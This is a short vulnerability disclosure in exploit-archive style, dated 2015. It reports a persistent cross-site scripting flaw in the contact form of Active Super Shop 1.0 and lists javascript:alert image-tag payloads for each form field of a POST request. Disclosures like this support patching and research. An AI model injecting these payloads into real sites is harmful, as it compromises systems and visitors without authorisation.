Active Super Shop version 1.0 suffers from a cross site scripting vulnerability.
3869aba5e13206d5477fbcf9ad1903f84c9bfa9ec684f5add583c66d48339757
# Exploit Title:Active Super Shop Persistent XSS
# Date: Fri July 17 2015
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://activeitzone.com/
# Version:1.0
# Tested on: archlinux
Vulnerability(persistent XSS)
========================
contact form fields vulnerable to persistent xss.
[+]Method:POST
1.http://URL/index.php/home/contact/ (;persistent XSS)
name=<IMG SRC="javascript:alert('HEY;)');
&email=<IMG SRC="javascript:alert('another script;)');
&subject=<IMG SRC="javascript:alert('every parameter;)');
&message=<IMG SRC="javascript:alert('injectable;)');